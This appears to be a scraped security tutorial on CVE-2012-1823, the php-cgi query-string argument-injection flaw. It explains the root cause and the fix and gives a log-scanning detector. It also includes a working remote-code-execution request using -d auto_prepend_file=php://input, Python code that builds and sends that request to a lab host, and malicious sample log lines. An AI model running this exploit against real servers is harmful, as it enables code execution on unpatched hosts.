2025-01-19 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)05/31 Report--
Today I will walk through how to analyze CVE-2012-1823, the php-cgi argument-injection vulnerability. Many people may not know much about it, so I have summarized the following; I hope you get something out of it.
1. The four operating modes of PHP (background you need)
(1) CGI
The full name is Common Gateway Interface. It is a standard for passing data between a web server and an external program: the server receives the client's request and hands the request data to the program (through environment variables, standard input and, as we will see, command-line arguments), and the program's standard output becomes the response. CGI is independent of any language; it can be written in anything that has standard input, standard output and environment variables, such as PHP, Perl or Tcl.
Under CGI the server starts a separate child process for every request, so performance collapses when there are many requests; it has been rarely used in recent years.
(2) FastCGI
FastCGI is the upgraded version of CGI: a resident (long-lived) CGI process that keeps running, so it does not have to parse php.ini, reload all extensions and reinitialize all data structures on every request the way a freshly started CGI process does.
PHP's FastCGI mode is managed by PHP-FPM (FastCGI Process Manager).
(3) CLI
PHP-CLI is short for PHP Command Line Interface, the interface used when PHP runs from the command line, as opposed to the PHP environments that run under a web server (PHP-CGI and so on).
In php-cli mode a PHP file can be started and executed directly, as workerman does.
(4) Module loading
This approach targets Apache: PHP runs as an Apache module (mod_php) inside the web server process.
2. Get to the point
(1) Affected versions
The vulnerability affects PHP before 5.3.12, and PHP 5.4.x before 5.4.2.
CVE-2012-1823 is a vulnerability in the php-cgi operating mode; it only occurs when PHP runs as a CGI binary executed by the web server (php-cgi). mod_php, PHP-FPM and the CLI are not affected.
(2) Root cause
Put simply, the query string of the user's request (the part of the URL after "?", which is the data the server extracts from the HTTP request) is handed to php-cgi as command-line arguments, and everything else follows from that.
RFC 3875 specifies that when the query string contains no unencoded "=" sign, the web server passes it to the CGI program as command-line arguments (split on "+", each piece URL-decoded). Apache implements this as required. PHP did know about this rule and originally handled it: in the web (CGI) context php-cgi refused to parse command-line options. But to make it convenient for developers to test with a shebang such as #!/usr/local/bin/php-cgi -d include_path=/path, the developers decided that php-cgi should not be prevented from accepting command-line arguments, believing that this did not conflict with the rest of the code.
So the guard in the source, if (!cgi) getopt(...), was removed.
Because of that, and because of the RFC rule above, command-line parameters reach php-cgi not only through a shebang line like #!/usr/local/bin/php-cgi -d include_path=/path but also through the query string of any HTTP request.
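To make the two halves of the root cause concrete, here is an added example (my own model, not Apache's or PHP's code) of the RFC 3875 rule Apache applies and of what the pre-5.3.12 php-cgi did with the resulting argv. cgi_argv mirrors Apache's behaviour as described above; vulnerable_php_cgi models only the options listed later in this article (-c, -n, -d, -s, -T, -h/-?), which is an assumption made for brevity, not PHP's real option parser.

```python
from urllib.parse import unquote


def cgi_argv(query_string: str) -> list[str]:
    """Command-line arguments Apache's mod_cgi derives from QUERY_STRING.

    RFC 3875 section 4.4: a query string that contains no *unencoded* '='
    is an "indexed" query, so the server splits it on '+' and URL-decodes
    each piece into one argv entry.  Any raw '=' (e.g. ?id=1) means the
    script gets no extra arguments at all.  Model of Apache's logic, not
    Apache's own code.
    """
    if not query_string or "=" in query_string:
        return []
    return [unquote(piece) for piece in query_string.split("+")]


def vulnerable_php_cgi(argv: list[str]) -> dict:
    """Model of php-cgi before 5.3.12 / 5.4.2, which ran getopt() over argv
    even when executed as a CGI.  Only the options discussed in the article
    are modelled (-c, -n, -d, -s, -T, -h/-?); real php-cgi accepts more."""
    state = {"ini": {}, "ini_file": "php.ini", "mode": "run", "repeat": 1}
    i = 0
    while i < len(argv):
        opt = argv[i]
        i += 1
        if not opt.startswith("-") or opt == "-":
            break  # getopt stops at the first non-option argument
        flag, attached = opt[:2], opt[2:]
        if flag in ("-d", "-c", "-T"):
            # getopt takes the value attached (-dfoo=1) or as the next argv (-d foo=1)
            if attached:
                value = attached
            elif i < len(argv):
                value, i = argv[i], i + 1
            else:
                break  # option is missing its argument
            if flag == "-d":
                key, sep, val = value.partition("=")
                state["ini"][key] = val if sep else "1"  # "-d foo" means foo=1
            elif flag == "-c":
                state["ini_file"] = value
            elif value.isdigit():
                state["repeat"] = int(value)
        elif flag == "-n":
            state["ini_file"] = None   # php.ini not loaded at all
        elif flag == "-s":
            state["mode"] = "source"   # highlighted source instead of execution
        elif flag in ("-h", "-?"):
            state["mode"] = "help"
    return state


def php_cgi_state(query_string: str) -> dict:
    """End-to-end: what a request with this query string makes php-cgi do."""
    return vulnerable_php_cgi(cgi_argv(query_string))


if __name__ == "__main__":
    for qs in ("page=home", "-s",
               "-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input"):
        print(qs, "->", cgi_argv(qs), php_cgi_state(qs))
```

The important edge is the first check in cgi_argv: a single raw "=" anywhere in the query string switches the whole mechanism off, which is why every "=" in the exploit below is sent as %3d.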
(3) Exploitation
In CGI mode the following command-line parameters become attacker-controllable:
-c specifies the location of the php.ini file (PHP's configuration file)
-n do not load the php.ini file
-d set a configuration directive (the same as an ini setting)
-b bind path for external FastCGI server mode
-s display the syntax-highlighted source of the script instead of running it
-T <count> run the script the given number of times and measure execution time
-h and -? show help
The simplest use is -s, which directly returns the script's source: requesting /index.php?-s makes the query string arrive as php-cgi's argument, so the response is the highlighted source of index.php rather than its output (the original article shows this against a self-built test environment).
A better way to exploit it is to turn it into an arbitrary file inclusion, and from there arbitrary code execution, by using -d to set auto_prepend_file:
The principle: use the controllable -d parameter to set allow_url_include to On and auto_prepend_file to php://input. auto_prepend_file makes PHP include the named file before the requested script runs, and php://input is the raw POST body, so whatever PHP code is in the POST body is executed and its output appears in the response. In the query string "+" is used instead of a space (it is the argument separator), and "=" and ":" are URL-encoded so that the raw query string contains no "=" (otherwise Apache would not pass it as arguments). The constructed request is as follows:
POST / index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 30
Sending the constructed request from Burp gives the following result:
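The request above, rebuilt as an added example (my own code, not from the original article): argv_to_query performs the encoding the text describes (each argument URL-encoded so no raw "=" survives, arguments joined with "+"), build_exploit_request derives Content-Length from the actual body, and send_raw/looks_exploited let you fire it at a lab target and check the marker the demo body prints. The host 127.0.0.1:8080 and the demo PHP body are assumptions for this example.

```python
import socket
from urllib.parse import quote

# PHP that auto_prepend_file=php://input will include before index.php runs.
# Constructed for this example; it must be complete PHP including the <?php tag.
DEMO_PHP_BODY = b'<?php echo "cve-2012-1823"; ?>'


def argv_to_query(args: list[str]) -> str:
    """Inverse of Apache's RFC 3875 split: URL-encode each argument so that
    '=' becomes %3D and ':' becomes %3A (the raw query string stays free of
    '='), then join with '+', which Apache treats as the argument separator.
    quote() turns a literal '+' inside an argument into %2B, so an argument
    can never be accidentally split in two."""
    return "+".join(quote(arg, safe="/") for arg in args)


def build_exploit_request(host: str, path: str = "/index.php",
                          php_body: bytes = DEMO_PHP_BODY) -> bytes:
    """Raw HTTP/1.1 request whose query string becomes
    '-d allow_url_include=on -d auto_prepend_file=php://input' for php-cgi."""
    query = argv_to_query(["-d", "allow_url_include=on",
                           "-d", "auto_prepend_file=php://input"])
    if "=" in query:
        raise ValueError("a raw '=' would stop Apache passing the query as argv")
    head = (
        f"POST {path}?{query} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(php_body)}\r\n"   # computed, never hand-typed
        "Connection: close\r\n"
        "\r\n"
    )
    return head.encode("ascii") + php_body


def send_raw(host: str, port: int, request: bytes, timeout: float = 5.0) -> bytes:
    """Send the raw request over plain TCP (no TLS) and return the whole response."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def looks_exploited(response: bytes, marker: bytes = b"cve-2012-1823") -> bool:
    """True if the marker printed by DEMO_PHP_BODY shows up in the response body."""
    _, _, body = response.partition(b"\r\n\r\n")
    return marker in body


if __name__ == "__main__":
    target_host, target_port = "127.0.0.1", 8080   # assumed lab target
    req = build_exploit_request(f"{target_host}:{target_port}")
    print(req.decode("ascii"))
    print("vulnerable:", looks_exploited(send_raw(target_host, target_port, req)))
```

With the demo body the computed Content-Length is 30, the same value as in the captured request above. A benign body such as echo is enough to confirm the condition; what you prepend is ordinary PHP, so the marker check is the only thing you need for a yes/no answer.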
(4) Fix
The fix works like this: take the query string and URL-decode it, skip all leading whitespace (every byte less than or equal to a space), then check whether the first remaining character is "-". If it is, set skip_getopt, i.e. do not parse command-line arguments. The fix source (in sapi/cgi/cgi_main.c) is as follows:
if ((query_string = getenv("QUERY_STRING")) != NULL && strchr(query_string, '=') == NULL) {
    /* we've got query string that has no '=' - apache CGI will pass it to command line */
    unsigned char *p;
    decoded_query_string = strdup(query_string);
    php_url_decode(decoded_query_string, strlen(decoded_query_string));
    for (p = decoded_query_string; *p && *p <= ' '; p++) { /* skip all leading spaces */ }
    if (*p == '-') {
        skip_getopt = 1;   /* do not run getopt() over the query-string argv */
    }
    free(decoded_query_string);
}
Note that this first check, shipped in 5.3.12 and 5.4.2, turned out to be incomplete and was tightened in 5.3.13 and 5.4.3 (CVE-2012-2311); those are the versions to upgrade to. If upgrading is not possible, the usual mitigation is to stop running PHP as a plain CGI binary (use mod_php or PHP-FPM) or to reject requests whose query string starts with "-" at the web server.
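Two things a practitioner wants from the fix logic above: a faithful model of the check, and a way to find past exploitation attempts. Here is an added example (my own code, not PHP's) that does both: skip_getopt_5_3_12 follows the C step by step (note that php_url_decode turns "+" into a space, hence unquote_plus), and flag_php_cgi_argv_requests runs it over access-log lines. The log lines and IP addresses are constructed for this example.

```python
import re
from urllib.parse import unquote_plus


def skip_getopt_5_3_12(query_string: str) -> bool:
    """Python model of the check php-cgi 5.3.12 / 5.4.2 added.

    Same steps as the C: only a query string with no raw '=' is examined
    (the only case Apache passes as argv); it is URL-decoded with '+'
    treated as a space (php_url_decode semantics), leading bytes <= ' '
    are skipped, and option parsing is refused when the first remaining
    byte is '-'.  Returns True when getopt() would be skipped.
    """
    if "=" in query_string:
        return False
    decoded = unquote_plus(query_string)
    p = 0
    while p < len(decoded) and decoded[p] <= " ":
        p += 1
    return p < len(decoded) and decoded[p] == "-"


# Constructed Apache access-log lines (common log format) for the demo.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [04/May/2012:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.5 - - [04/May/2012:10:00:02 +0000] "GET /index.php?-s HTTP/1.1" 200 1840
10.0.0.9 - - [04/May/2012:10:00:03 +0000] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 200 64
10.0.0.9 - - [04/May/2012:10:00:04 +0000] "GET /index.php?%20+-d+safe_mode%3doff HTTP/1.1" 200 64
10.0.0.5 - - [04/May/2012:10:00:05 +0000] "GET /search.php?q=-s HTTP/1.1" 200 512
10.0.0.5 - - [04/May/2012:10:00:06 +0000] "GET /index.php HTTP/1.1" 200 512
"""

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def flag_php_cgi_argv_requests(log_text: str) -> list[dict]:
    """Return the entries whose query string would have reached a vulnerable
    php-cgi as command-line options, i.e. exactly the requests the 5.3.12
    check refuses.  Requests with a raw '=' or no query string are never
    flagged, so ordinary ?id=1 traffic stays quiet.  'argv' is the decoded
    query split on whitespace, an approximation of Apache's split for the
    analyst's benefit."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        target = m.group("target")
        if "?" not in target:
            continue
        path, query = target.split("?", 1)
        if skip_getopt_5_3_12(query):
            hits.append({"method": m.group("method"), "path": path,
                         "query": query, "argv": unquote_plus(query).split()})
    return hits


if __name__ == "__main__":
    for hit in flag_php_cgi_argv_requests(SAMPLE_ACCESS_LOG):
        print(hit["method"], hit["path"], hit["argv"])
```

The fourth sample line shows why the whitespace skip matters: "%20+-d+safe_mode%3doff" decodes to two spaces followed by -d, so a check that only looked at the very first byte would miss it.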